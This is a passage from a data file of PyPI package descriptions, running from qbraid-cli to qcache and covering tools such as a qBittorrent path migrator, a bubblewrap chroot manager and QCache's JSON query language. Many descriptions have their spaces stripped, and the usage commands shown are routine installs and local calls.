It is not intended for local installations or use outside the qBraid Lab environment. This tool ensures seamless integration and optimized performance specifically tailored for qBraid Lab's unique cloud-based quantum computing ecosystem.Getting StartedTo use the qBraid CLI, login to qBraid (or create an account), launch Lab, and then open Terminal. You can also access the CLI directly from withinNotebooksusing the!operator. Seequantum jobs example.Launch qBraid Lab \u2192Make an account \u2192For help, see qBraid Lab User Guide:Getting Started.Basic Commands$qbraid\n-------------------------------\n*WelcometotheqBraidCLI!*\n--------------------------------Use`qbraid-h`toseeavailablecommands.-Use`qbraid--version`todisplaythecurrentversion.\n\nReferenceDocs:https://docs.qbraid.com/projects/cli/en/latest/cli/qbraid.htmlA qBraid CLI command has the following structure:$qbraid[optionsandparameters]For example, to list installed environments, the command would be:$qbraidenvslistTo view help documentation, use one of the following:$qbraidhelp$qbraidhelp$qbraidhelpFor example:$qbraidhelpGroupqbraid\n\nSubgroupsenvs:ManageqBraidenvironments.kernels:ManageqBraidkernels.jobs:ManageqBraidQuantumJobs.\n\nArguments-V,--version:ShowversionandexitGlobalArguments-h,--help:Showthishelpmessageandexit.\n\nReferenceDocs:https://docs.qbraid.com/en/latest/cli/qbraid.htmlTo get the version of the qBraid CLI:$qbraid--version"} +{"package": "qbraid-qir", "pacakge-description": "Work in progressqBraid-SDK extension providing support for QIR conversions.This project aims to makeQIRrepresentations accessible via the qBraid-SDKtranspiler, and by doing so, open the door to language-specific conversions from any and all high-level quantum languagessupportedbyqbraid. See QIR Alliance:why do we need it?.Getting startedInstallationpipinstallqbraid-qirExampleimportcirqfromqbraid_qirimportcirq_to_qirq0,q1=cirq.LineQubit.range(2)circuit=cirq.Circuit(cirq.H(q0),cirq.CNOT(q0,q1),cirq.measure(q0,q1))module=cirq_to_qir(circuit,name=\"my-circuit\")ir=str(module)DevelopmentInstall from sourcegitclonehttps://github.com/qBraid/qbraid-qir.gitcdqbraid-qir\npipinstall-e.Run testspipinstall-rrequirements-dev.txt\npytesttestswith coverage reportpytest--cov=qbraid_qir--cov-report=termtests/Build docscddocs\npipinstall-rrequirements.txt\nmakehtmlArchitecture diagram"} +{"package": "qbreader", "pacakge-description": "QBreader Python API wrapper moduleAccessing the QBreader API with a python wrapper module.DocumentationGet a list of sets from the QBreader databaseset_list()This function gets a list of sets from the QBreader database.Search the QBreader databasequery()This function searches the QBreader database for questions that match the parameters specified.ParameterTypeValuesDescriptionquestionTypestringtossup,bonus,allThe type of question to search for. Defaults to \"all\". If one of the three is not set, returns a 400 Bad Request.searchTypestringquestion,answerThe type of search to perform. Defaults to \"all\". If one of the three is not set, returns a 400 Bad Request.queryStringstringAny string.The string to search for. Defaults to \"\".regexboolTrue,FalseWhether or not to use regular expressions for the queryString. Defaults to \"False\".randomizeboolTrue,FalseWhether or not to randomize the order of the results. Defaults to \"False\".setNamestringAny stringThe difficulties to search for. Defaults to []. Leave as an empty list to search all. 
Must be a list of ints from 1 to 10.difficultieslist[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]The string to search for. Defaults to \"\".categorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The categories to search for. Defaults to []. Leave as an empty list to search all.subcategorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The subcategories to search for. Defaults to []. Leave as an empty list to search all.maxQueryReturnLengthintAny integer.The maximum number of questions to return. Defaults to None. Leave blank to return 50. Anything over 200 will not work.Get a random question from the QBreader databaserandom_question()This function gets a random question from the QBreader database.ParameterTypeValuesDescriptionquestionTypestringtossup,bonusThe type of question to search for (tossup or bonus). If one of the two is not set, returns a 400 Bad Request.difficultieslist[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]The string to search for. Defaults to \"\".categorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The categories to search for. Defaults to []. Leave as an empty list to search all.subcategorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The subcategories to search for. Defaults to []. Leave as an empty list to search all.numberintAny integer.The number of questions to return. Defaults to None. Leave blank to return 1.Generate a random namerandom_question()This function Generates an adjective-noun pair (used in multiplayer lobbies)Get questions from a packet from the QBreader databasepacket()This function gets questions from a packet from the QBreader database.ParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().packetNumberintAny integer that corresponds to a packet number, usually from 1-11.The number of the packet to search for.Get a packet's tossups from the QBreader databasepacket_tossups()This function gets a packet's tossups from the QBreader database. Twice as fast as using packet().ParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().packetNumberintAny integer that corresponds to a packet number, usually from 1-11.The number of the packet to search for.Get a packet's bonuses from the QBreader databasepacket_bonuses()This function gets a packet's bonuses from the QBreader database. Twice as fast as using packet().ParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().packetNumberintAny integer that corresponds to a packet number, usually from 1-11.The number of the packet to search for.Get the number of packets in a set from the QBreader databasepacket_bonuses()This function gets the number of packets in a set from the QBreader databaseParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().Report a question from the QBreader databasereport_question()This function reports a question from the QBreader database.ParameterTypeValuesDescription_idstringCan be obtained from thequery(),random_question,packet(),packet_bonuses, orpacket_tossups.The ID of the question to report.reasonstringN/AThe reason for reporting the question. Defaults to None.descriptionstringN/AA description of the reason for reporting the question. 
Defaults to None.Get a list of rooms from the QBreader databaseroom_list()This function gets a list of rooms from the QBreader database."} +{"package": "qbs", "pacakge-description": "See theGitLab repositoryfor the most up-to-date documentation.New in version 2.0.0: t_auto command! Any existing commands named t_auto will be broken."} +{"package": "qb-sdk", "pacakge-description": "qb-sdk-pythonBrand SDK for the qiibee blockchain.RequirementsConsult thedocsto see how to obtain the credentials necessary for this.Installationpip install qb-sdkExample usageImport the SDK library:import qbsdkInitialize the API object:api_key = os.environ['QB_API_KEY']\nbrand_address_private_key = os.environ['BRAND_ADDRESS_PRIVATE_KEY']\ntoken_symbol = os.environ['BRAND_TOKEN_SYMBOL']\napi = qbsdk.Api(api_key)Fetch existing tokens:tokens = api.get_tokens()\nfor token in tokens.private:\n print(vars(token))Reward a particular user:wallet = qbsdk.Wallet(brand_address_private_key, token_symbol, api, transfer_strategy=qbsdk.TransferStrategy.brand)\n\nwallet.setup()\n\ntransfer_receiver = '0x87265a62c60247f862b9149423061b36b460f4bb'\ntx = wallet.send_transaction(transfer_receiver, 10)Check out theexamplesdirectory for more comprehensive examples."} +{"package": "qbstreamlit", "pacakge-description": "qbstreamlitFunctions for quizbowl detailed stats."} +{"package": "qbstyles", "pacakge-description": "QB StylesQB Styles is a python package with a light and a darkmatplotlibstyle.Dark styleLight styleHow do I install QB Styles?qbstylesis a Python package. To install it, simply run:pipinstallqbstylesHow do I use QB Styles?You can use the dark Matplotlib style theme in the following way:fromqbstylesimportmpl_stylempl_style(dark=True)And to use the light Matplotlib style theme, you can do the following:fromqbstylesimportmpl_stylempl_style(dark=False)How do I use QB Styles in Jupyter Notebooks?\u26a0\ufe0f Please make sure you runfrom qbstyles import mpl_styleandmpl_style()indifferent cellsas shown below. Seethis issuefor more details.# first cellfromqbstylesimportmpl_style# second cellmpl_style()What chart types can use QB Styles?Line plotsScatter plotsBubble plotsBar chartsPie chartsHistograms and distribution plots3D surface plotsStream plotsPolar plotsCan you show me a few examples?To run the examples inexample.ipynb, install the required packages usingpip install -r requirements_notebook.txtin a Python virtual environment of your choice.importmatplotlib.pyplotaspltfromqbstylesimportmpl_styledefplot(dark):mpl_style(dark)fig,axes=plt.subplots(2,2,figsize=(15,10))# the following functions are defined in example.ipynbline_plot(axes[0,0])scatter_plot(axes[0,1])distribution_plot(axes[1,0])ax=plt.subplot(2,2,4,projection='polar')polar_plot(ax)plot(dark=True)plot(dark=False)How do I create my own styles?Have a look at the filesqb-common.mplstyle,qb-dark.mplstyleandqb-light.mplstyle. 
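For a sense of what those .mplstyle files hold, a few lines in standard matplotlibrc syntax are sketched below; the keys are real matplotlib rc settings, but the values are illustrative rather than copied from the package.
axes.facecolor: 1a1a27
figure.facecolor: 1a1a27
grid.color: 3d3d4d
lines.linewidth: 2.0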
They contain many elements that you may want to customise.To do so, create a file similar to the above files at the root of your project, and apply it after theqbstyleas follows:importmatplotlib.pyplotaspltfromqbstylesimportmpl_stylempl_style()plt.style.use('./your-style.mplstyle')All ofmatplotlibrc's options can be foundhere.What licence do you use?QB Styles is licensed under theApache 2.0 License."} +{"package": "qbt", "pacakge-description": "No description available on PyPI."} +{"package": "qbt_migrate", "pacakge-description": "qBt MigrateThis tool changes the paths of existing torrents in qBittorrent in a bulk fashion.\nIt can also convert slashes when migrating between Windows and Linux/Mac.Also check out my Chrome Extension for handling TV Episode torrents.qBt TV Torrent UploadChrome Web StoreSourceUsageALWAYSensure qBittorrent is closed before runningqbt_migrate.\nEither quit throughFile->Exit, task tray icon, or task manager for your system.Install from PyPi usingpip, or jump toExamplesfor Dockerpip install qbt_migrateRun the script and follow prompts or use CLI arguments with commandqbt_migrateusage: qbt_migrate [-h] [-e EXISTING_PATH] [-n NEW_PATH] [-r] [-t {Windows,Linux,Mac}] [-b BT_BACKUP_PATH] [-s] [-l {DEBUG,INFO}] [-v]\n\noptions:\n -h, --help show this help message and exit\n -e EXISTING_PATH, --existing-path EXISTING_PATH\n Existing root of path to look for.\n -n NEW_PATH, --new-path NEW_PATH\n New root path to replace existing root path with.\n -r, --regex Existing and New paths are regex patterns. (Capture groups recommended).\n -t {Windows,Linux,Mac}, --target-os {Windows,Linux,Mac}\n Target OS (converts slashes). Default will auto-detect if conversion is needed based on existing vs new.\n -b BT_BACKUP_PATH, --bt-backup-path BT_BACKUP_PATH\n BT_backup Path Override.\n -s, --skip-bad-files Skips bad .fastresume files instead of exiting. Default behavior is to exit.\n -l {DEBUG,INFO}, --log-level {DEBUG,INFO}\n Log Level, Default is INFO.\n -v, --version Prints the current version number and exits.By default, everything happens in the BT_backup directory defined by the OS the script is running on.\nOverrideBT_backuppath if needed.Default BT_backup paths:Windows:%LOCALAPPDATA%/qBittorrent/BT_backupLinux/Mac:$HOME/.local/share/data/qBittorrent/BT_backupDocker:/config/qBittorrent/BT_backupA backup zip archive is automatically created in theBT_backupdirectory.ExamplesAssuming all of our torrents are inX:\\Torrentswhen coming from Windows, or/torrentswhen coming from Linux/MacNOTE:When runningqbt_migrateon a Linux/Mac machine, Windows paths will require double\\. 
Ex.C:\\\\Users\\\\user\\\\Downloads\\\\TorrentsNOTE:Take note of trailing slash replacement when changing from Windows <-> Linux.-e X:\\ -n /torrentswill result in/torrentsxxxxx, not/torrents/xxxxx.\nThe correct pattern for this would be-e X: -n /torrentsor-e X:\\ -n /torrents/.qbt_migrate -e X:\\ -n Z:\\ -t Windows # Windows to Windows (Drive letter change)\nqbt_migrate -e X:\\Torrents -n X:\\NewDir\\Torrents -t Windows # Windows to Windows (Directory Change)\nqbt_migrate -e X:\\Torrents -n Z:\\NewDir\\Torrents -t Windows # Windows to Windows (Drive letter change with directory change)\nqbt_migrate -e X: -n /torrents -t Linux # Windows to Linux/Mac (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths # Note Trailing Slash\nqbt_migrate -e X:\\Torrents -n /torrents -t Linux # Windows to Linux/Mac (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths\nqbt_migrate -e X:\\\\Torrents -n /torrents -t Linux # Windows to Linux/Mac (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths\n\nqbt_migrate -e /torrents -n /new/path/for/torrents # Changes torrent root path on Linux/Mac\nqbt_migrate -e /torrents -n Z:\\Torrents -t Windows # Linux/Mac to Windows (converts slashes)\nqbt_migrate -e /torrents -n Z:\\\\Torrents -t Windows # Linux/Mac to Windows (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths\n\n# Adavanced Usage with RegEx\n# Example would replace /some/test/with/a/path with /test/matched/path\nqbt_migrate -r -e /some/(\\w+)/.*$ -n \\1/matched/path -t Linux # Matches using regex patterns and replaces using capture groups.\nqbt_migrate --regex -e /some/(\\w+)/.*$ -n \\1/matched/path -t Linux # Matches using regex patterns and replaces using capture groups.DockerYou can also run this tool with Docker if you don't have Python, or don't want to install the package to your system directly.\nThe BT_backup path is automatically overridden to/tmp/BT_backup, so mount yourBT_backupthere.NOTE:When runningqbt_migrateDocker image on a Linux/Mac machine, Windows paths will require double\\. 
Ex.C:\\\\Users\\\\user\\\\Downloads\\\\TorrentsThe Docker image has all functionality as the pip install, following the same arguments/patterns listed in the above examples.For example, mounting in the default BT_backup path on a Windows machine running Dockerdocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\ndocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\Torrents -n X:\\NewDir\\Torrents -t Windows # Windows to Windows (Directory Change)\n...Mounting in the default BT_backup path on a Linux/Mac machine running Dockerdocker run -v $HOME/.local/share/data/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\ndocker run -v $HOME/.local/share/data/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\Torrents -n X:\\NewDir\\Torrents -t Windows # Windows to Windows (Directory Change)\n...If for some reason you wanted to override BT_backup path from/tmp/BT_backupwithin the container, simply set\nenvironment variableBT_BACKUP_PATHon the container to where you will be mounting in.The-efor environment variable override must go before the imagejslay88/qbt_migrateas the-eafter the image is for--existing-pathdocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/opt/qbt_migrate/fastresume -e BT_BACKUP_PATH=/opt/qbt_migrate/fastresume jslay88/qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\n...You can also clone this repository, build the image, and run your own built imagedocker build . -t qbt_migrate\ndocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/tmp/BT_backup qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\n...Python ModuleThis project has also been built to be modular and used as a Python Module. If you feel like utilizing this project within your own,\nplease feel free to do so, and let me know!Use Cases:UI for qbt_migrateFastResumeClassTorrent Manager"} +{"package": "qbuf", "pacakge-description": "UNKNOWN"} +{"package": "qbuffer", "pacakge-description": "No description available on PyPI."} +{"package": "qbuild", "pacakge-description": "qbuildis a build system for Quera technology challenges.InstallationFor installing qbuild, run the following command:$sudopipinstallqbuildChallenge Structurechallenge-name (git repo)\n\u251c\u2500\u2500 src\n\u2502 \u251c\u2500\u2500 [ ... source and test files ... ]\n\u2502 \u251c\u2500\u2500 .gitignore (optional)\n\u2502 \u251c\u2500\u2500 .qignore (optional)\n\u2502 \u251c\u2500\u2500 .qsolution (optional)\n\u2502 \u251c\u2500\u2500 .qtest (optional, BUT USUALLY NEEDED)\n\u2502 \u2514\u2500\u2500 .qrun.py (optional)\n\u251c\u2500\u2500 statement\n\u2502 \u251c\u2500\u2500 attachments\n\u2502 \u2502 \u2514\u2500\u2500 [ ... image files ... ]\n\u2502 \u2514\u2500\u2500 statement.md\n\u251c\u2500\u2500 .gitignore\n\u251c\u2500\u2500 README.md (generated from statement/statement.md, DO NOT EDIT)\n\u251c\u2500\u2500 tester_config.json\n\u2514\u2500\u2500 valid_filesCLI Usageqbuild: Build the challengeFirst,cdto the root of the challenge's git repository. Then runqbuildcommand. That's it!$cdGIT-REPO\n$qbuildForjupyterproblems if you need generate nonquera initial:$qbuild--jupyterFolderdistand fileREADME.mdwill be generated.\nIt creates folder.qbuildfor its internal work.\nDo not push it. 
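A minimal .gitignore entry covering both generated paths could look like the two lines below; the exact patterns are an assumption and should be adjusted to the repository's layout.
dist/
.qbuild/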
Adddistand.qbuildto gitignore.qbuild diff$cdGIT-REPO\n$qbuilddiffThis command generates a diff betweeninitialandmodel_solutionexports.It's helpful for checking that things are set correctly.qbuild tree$qbuildtreepath/to/some/directoryUseqbuild treeto print the tree structure of a directory.Do notusetreecommand or anything else.qbuild --versionPrints currently installed version.FeaturesProblem Statementstatement\n\u251c\u2500\u2500 attachments\n\u2502 \u251c\u2500\u2500 image1.png\n\u2502 \u2514\u2500\u2500 image2.png\n\u2514\u2500\u2500 statement.mdstatement.mdis a Jinja2 template and must inheritstatement_base.md.\nYou can use variableshas_initial,initial_structure,solution_structure.{% extends \"statement_base.md\" %}\n\n{% block name %}Problem Name{% endblock %}\n\n{% block readme %}\n... extra info about problem ...\n{% endblock readme %}\n\n{% block intro %}\n... intro ...\n![Image 1](attachments/image1.png)\n{% endblock intro %}\n\n{% block details %}\n... details ...\n{% endblock details %}\n\n{% block notes %}\n... notes ...\n```\n{{ solution_structure }}\n```\n{% endblock notes %}Ignore files:.qignore,.qsolution,.qtest,.qsampletestThese files must be at the root ofsrcfolder.\nTheir syntax is like gitignore.\nYou can specify test files in.qtestYou can specify sample test files in.qsampletest. This files just hide inmodel_solutionexport.\nand solution files in.qsolution.\nFiles ignored by.qignorewill be removed in all exports.Warning:.qhideis deprecated and is replaced by.qsolution.Replacement Rules: Comment Directives// _q_solution_begin\n ... Part of Solution ...\n// _q_end\n\n// _q_test_begin\n ... Part of Test ...\n// _q_endThey can also have areplaceblock:// _q_solution_begin\n ... Part of Solution ...\n// _q_replace\n// ... This will be uncommented & replaced ...\n// _q_end\n\n/* _q_test_begin */\n ... Part of Test ...\n/* _q_replace */\n/* ... This will be uncommented & replaced ... */\n/* _q_end */Any one-line comment syntax is supported.Comments in each block should follow the same syntax.\ne.g. You can't mix// ...and/* ... 
*/.Warning: These directives are depricated:_q_hide_from_users_begin: replaced by_q_solution_begin_q_hide_from_users_end: replaced by_q_endReplacement Rules:.nosolution,.notestWhen comment directives can't help...src/path/to/some/file.js\nsrc/path/to/some/file.nosolution.js (`file.js` without solution)\n\nsrc/path/to/some/file.js\nsrc/path/to/some/file.notest.js (`file.js` without test)Warning:.initialis deprecated and is replaced by.nosolution.Build hook:.qrun.py.qrun.pymust be at the root ofsrc.qbuildruns.qrun.pyin each export.Arguments passed to.qrun.py:--hide-solution: If passed, current export shouldn't contain solutions.--hide-test: If passed, current export shouldn't contain tests.Use.qrun.pyonly if other features are not enough."} +{"package": "qbuilder", "pacakge-description": "# QuerybuilderA module to build human readable SQL query string and then optionally convert them towhere()caluse expressions for [Peewee](http://peewee-orm.com).`python from querybuilder import Field as F, AND, OR query =OR(AND(F('pageviews')>= 10000,F('author_ids').contains(7,8,9)))`"} +{"package": "qbuki", "pacakge-description": "No description available on PyPI."} +{"package": "qbuspy", "pacakge-description": "qbuspy"} +{"package": "qbwc", "pacakge-description": "## QBWC: Quickbooks Desktop WebconnectorExperimentalDjango package for syncing data between django application and\nQuickBooks Desktop via the Quickbooks Webconnector (QBWC).Implementation includes transfer services (push, pull, re-sync) for:gl accountsother name listexpenses (credit card charges)customerscredit cardsvendorsRoad map:vendor billsjournal entriesQuickBooks Reports## InstallationInstall the latest development version from github using:` pip installgit+https://github.com/bill-ash/qbwc`or from pypi:` pip install qbwc `## ExampleExample directory includes application with sample apps for each of the entites mentioned above.Repeated patterns will be abstracted in theBaseObjectMixinmodel and are likely to change."} +{"package": "qbwrap", "pacakge-description": "QBwrapQuick Bubblewrap chroot management tool.AboutQBwrap is a tool that allows for quick bwrap chroot management with toml\nconfiguration files.SampleA sample QBwrap configuration file might look something like this:[core]location=\"/chroots/my-chroot\"hostname=\"test\"process=\"bash -l\"[mount]rw=[[\"/chroots/my-chroot\",\"/\"],]ro=[\"/etc/resolv.conf\",]dev=[\"/dev\",]proc=[\"/proc\",]tmpfs=[[\"/dev/shm\",{}],[\"/tmp\",{perms=\"1777\"}],]DocumentationDocumentation can either be built locally or browsed online onGitLab pages.Command-line interfaceUsageqbwrap [-h] [-V] [-q] [-f] [-r]\n [-R ROOT_METHOD] [-S DEV_SIZE] [-e EXECUTABLE] [-p PROCESS] [-m MERGE]\n [-P COLLECTION_PATH]\n [-c {default,always,never}]\n [--no-setup] [--force-setup]\n qbwrap_filePositional argumentsqbwrap_file path to the QBwrap config fileOptions-h, --help show this help message and exit\n -V, --version show program's version number and exit\n -q, --quiet be quiet, limit information output\n -f, --fake do not actually call bwrap\n -r, --root call bwrap as root\n -R ROOT_METHOD, --root-method ROOT_METHOD\n which method to use to become root\n -S DEV_SIZE, --dev-size DEV_SIZE\n default size for special devices, eg. 
tmpfs\n -e EXECUTABLE, --executable EXECUTABLE\n bubblewrap executable to call, defaults to \"bwrap\"\n -p PROCESS, --process PROCESS\n override process command to start inside bwrap chroot\n -m MERGE, --merge MERGE\n override any stanza of given QBwrap config\n -P COLLECTION_PATH, --collection-path COLLECTION_PATH\n overwrite path of the QBwrap collection\n -c {default,always,never}, --use-collection {default,always,never}\n whether and how to use the QBwrap collection\n --no-setup do not run setup (from the setup stanza) even if required\n --force-setup force to run setup defined in the setup stanzaInstallationPyPiAvailable at pypi.org/project/qbwrap: pip install --user --break-system-packages qbwrapRepositorySee instructions in the xgqt-python-app-qbwrap repository's README.md file."} +{"package": "qbx", "pacakge-description": "No description available on PyPI."} +{"package": "qbz95", "pacakge-description": "This is a machine learning library that brings together the following: use of and experiments with common algorithms; common data acquisition and data processing; algorithms and experiments I have written myself. Although I have studied machine learning for several years, taken part in quite a few projects and tried many algorithms, every time a new problem comes up much of the code still has to be hunted down and some experiments have to be modified before they can be reproduced, which easily breaks the train of thought.\nThe purpose of creating this machine learning library is to raise the efficiency of model building: when a new problem arrives, existing methods can be used to validate it quickly and a direction can be found."} +{"package": "qbzstoredl", "pacakge-description": "Downloader for music from the Qobuz download storeQobuz recently discontinued support for tarball downloads.\nInstead, you now have to use their Qobuz Downloader app that is not available on Linux.\nSince the Downloader app never worked for me anyway and I like to use Linux, I have made this script to act as a replacement for the Downloader on Linux.InstallationPrerequisites:Python 3.11 (other versions might also work, not tested)poetryffmpegFrom pippip install qbzstoredl\nqbzstoredl --register pipFrom gitgit clone https://gitlab.com/pkerling/qbzstoredl.git\ncd qbzstoredl\npoetry install\npoetry run qbzstoredl --register poetryMIME handlerThe last step registers an URL handler for the qbzdl scheme that is used by the official downloader and allows any browser to just launch the script from the normal Qobuz download page.\nBe aware that it will not work any more and you need to rerun qbzstoredl --register if you move the directory containing this repository.UsageLog in to Qobuz in your browser.Go to \"My purchases\" or open a download link from a successful purchase email.Click \"Download with Qobuz Downloader\".Click \"Open\" in the popup.Depending on your browser, allow the URL to be opened with qbzstoredl.Watch as the music is being downloaded to the out folder.Manual usageOn the Qobuz download page, note the URL starting with qbzdl:// resulting from the click on \"Open\" in the download popup.\nYou can use it on the terminal like this:poetry run qbzstoredl qbzdl://...NotesAs
far as I could tell, the Downloader always downloads the FLAC version of the tracks.\nIf MP3 is desired, it is converted on the user's PC, so this is what this script also does.I have tested this only with a few albums in my own collection, which exclusively contains CD quality albums, so YMMV.\nFeel free to report problems, but I will likely not be able to help without theqbzdl://URL for the download, which you can send me privately."} +{"package": "qc", "pacakge-description": "UNKNOWN"} +{"package": "qc2champ", "pacakge-description": "qc2champ is a Python library that connverts outputs from various\nquantum chemical calculations to CHAMP input files. It relies on cclib\nfor parsers."} +{"package": "qc2tsv", "pacakge-description": "https://github.com/ENCODE-DCC/qc2tsv"} +{"package": "qc3", "pacakge-description": "No description available on PyPI."} +{"package": "qcache", "pacakge-description": "QCache is a key-table cache, an in memory cache server with analytical query capabilities.While the more commonly known key-value caches (such asMemcached) lets you fetch a value\nbased on a key QCache lets you run queries against a table based on a key.MotivationYou are working with table data that you want to run flexible queries against but do not want to\nload them into an SQL database or similar because of any of the following:The operational cost and complexity of bringing in an SQL serverThe tables do not have a homogeneous formatThe data is short livedNot all data available is ever used, you only want to use resources on demandYou want to treat queries as data and build them dynamically using data structures\nthat you are used to (dictionaries and lists or objects and arrays depending on your\nlanguage background)Expensive JOINs are required to create the table.\u2026Or, you are building server software and want to add the possibility for your clients to run\nqueries directly against the data without the need for dreadful translations between a REST\ninterface with some home grown filter language.FeaturesSimple, single thread, single process, server.Expressive JSON-based query language with format and features similar to SQL SELECT. Queries\nare data that can easily be transformed or enriched.Support for JSON or CSV input and output formatPerformant queries on tables as large as 10 x 1000000 cells out of the boxNo need for table definitions, tables are created dynamically based on the data insertedStatistics about hit and miss count, query and insert performance and more available\nthrough HTTP APIScales linearly in query capacity with the number of servers. A python client library that\nuses consistent hashing for key distribution among servers is available\nhereQCache-client. There\u2019s also a basic Go client hereGo-QCache-client.\nMore clients are welcome!RequirementsPython 2.7 (2.7.9+ if using TLS) for nowInstallationpip install qcacheRunningqcacheThis will start qcache on the default port using the default cache size. To get help on available parameters:qcache --helpDockerYou can also get the latest version as a Docker image. This is probably the easiest way to try it out if you\nare running Linux or if you have Docker Machine installed.docker run -p 9401:9401 tobgu/qcacheLicenseMIT licensed. See the bundledLICENSEfile for more details.Query examplesBelow are examples of the major features of the query language. A JSON object is used to\ndescribe the query. 
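Before walking through the individual query features, here is a minimal sketch of sending such a JSON query object from Python; it relies only on the dataset endpoint shown in the curl examples further below, and the use of the requests library is an assumption rather than part of QCache itself.
import json
import requests

# Build a query object using the JSON syntax described in the examples that follow
query = {"select": ["foo", "bar"], "where": [">", "baz", 10], "limit": 50}

# requests URL-encodes the 'q' parameter before issuing the GET
response = requests.get(
    "http://localhost:8888/qcache/dataset/my-key",
    params={"q": json.dumps(query)},
)
print(response.status_code)
print(response.text)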
The query should be URL encoded and passed in using the \u2018q\u2019 GET-parameter.The query language uses LISP-style prefix notation for simplicity. This makes it easy\nto parse and build queries dynamically since no rules for operator precedence\never need to be applied.Like so:http://localhost:8888/qcache/datasets/?q=You can also POST queries as JSON against:http://localhost:8888/qcache/datasets//q/This is a good alternative to GET if your queries are too large to fit in the query string.Select allAn empty object will return all rows in the table:{}Projection{\"select\":[\"foo\",\"bar\"]}Not specifying select is equivalent to SELECT * in SQLColumn aliasing{\"select\":[[\"=\",\"foo\",\"bar\"]]}This will rename column bar to foo in the result.You can also make more elaborate calculations in the aliasing expression.{\"select\":[[\"=\",\"baz\",[\"+\",[\"*\",\"bar\",2],\"foo\"]]]As well as simple constant assignments.{\"select\":[[\"=\",\"baz\",55]]}FilteringComparison{\"where\":[\"<\",\"foo\",1]}The following operators are supported:==, !=, <=, <, >, >=In{\"where\":[\"in\",\"foo\",[1,2]]}Like/ilikeLike and ilike are used for string matching and work similar to LIKE in SQL. Like is case sensitive\nwhile ilike is case insensitive. In addition to string matching using % as wildcard like/ilike also\nsupports regexps.{\"where\":[\"like\",\"foo\",\"'%bar%'\"]}Bitwise operatorsThere are two operators for bitwise filtering on integers:all_bitsandany_bits.all_bits - evaluates to true if all bits in the supplied argument are set in value tested against.any_bits - evaluates to true if any bits in the supplied argument are set in value tested agains.{\"where\":[\"any_bits\",\"foo\",31]}Clauses{\"where\":[\"&\",[\">\",\"foo\",1],[\"==\",\"bar\",2]]}The following operators are supported:&, |Negation{\"where\":[\"!\",[\"==\",\"foo\",1]]}OrderingAscending{\"order_by\":[\"foo\"]}Descending{\"order_by\":[\"-foo\"]}OffsetGreat for pagination of long results!{\"offset\":5}LimitGreat for pagination of long results!{\"limit\":10}Group by{\"group_by\":[\"foo\"]}AggregationAggregation is done as part of the select, just like in SQL.{\"select\":[\"foo\"[\"sum\",\"bar\"]],\"group_by\":[\"foo\"]}DistinctDistinct has its own query clause unlike in SQL.{\"select\":[\"foo\",\"bar\"],\"distinct\":[\"foo\"]}Sub queries using fromFilter, transform and select your data in multiple steps.{\"select\":[[\"=\",\"foo_pct\",[\"*\",100,[\"/\",\"foo\",\"bar\"]]]],\"from\":{\"select\":[\"foo\",[\"sum\",\"bar\"]],\"group_by\":[\"foo\"]}}Sub queries using inFilter your data using the result of a query as filter input.{\"where\",[\"in\",\"foo\",{\"where\":[\"==\",\"bar\",10]}]}All together now!A slightly more elaborate example. 
Get the top 10 foo:s with most bar:s.{\"select\":[\"foo\",[\"sum\",\"bar\"]],\"where\":[\">\",\"bar\",0],\"order_by\":[\"-bar\"],\"group_by\":[\"foo\"],\"limit\":10}API examples using curlUpload table data to cache (a 404 will be returned if querying on a key that does not exist).curl -X POST --data-binary @my_csv.csv http://localhost:8888/qcache/dataset/my-keyQuery tablecurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"select\\\": [[\\\"count\\\"]], \\\"where\\\": [\\\"<\\\", \\\"baz\\\", 99999999999915], \\\"offset\\\": 100, \\\"limit\\\": 50}\"\ncurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"select\\\": [[\\\"count\\\"]], \\\"where\\\": [\\\"in\\\", \\\"baz\\\", [779889,8958854,8281368,6836605,3080972,4072649,7173075,4769116,4766900,4947128,7314959,683531,6395813,7834211,12051932,3735224,12368089,9858334,4424629,4155280]], \\\"offset\\\": 0, \\\"limit\\\": 50}\"\ncurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"where\\\": [\\\"==\\\", \\\"foo\\\", \\\"\\\\\\\"95d9f671\\\\\\\"\\\"], \\\"offset\\\": 0, \\\"limit\\\": 50}\"\ncurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"select\\\": [[\\\"max\\\", \\\"baz\\\"]], \\\"offset\\\": 0, \\\"limit\\\": 500000000000}\"Custom request HTTP headersThere are a couple of custom HTTP headers that can be used to control the behaviour of Q-Cache.Posting tablesX-QCache-typesQCache will usually recognize the data types of submitted data automatically. There may be times when\nstrings are mistaken for numbers because all of the data submitted for a column in a dataset happens\nto be in numbers.This header makes it possible to explicitly type column to be a string to. In the example below columns\nfoo and bar are both typed to string.X-QCache-types: foo=string;bar=stringExplicitly setting the type to string is only relevant when submitting data in CSV. With JSON the 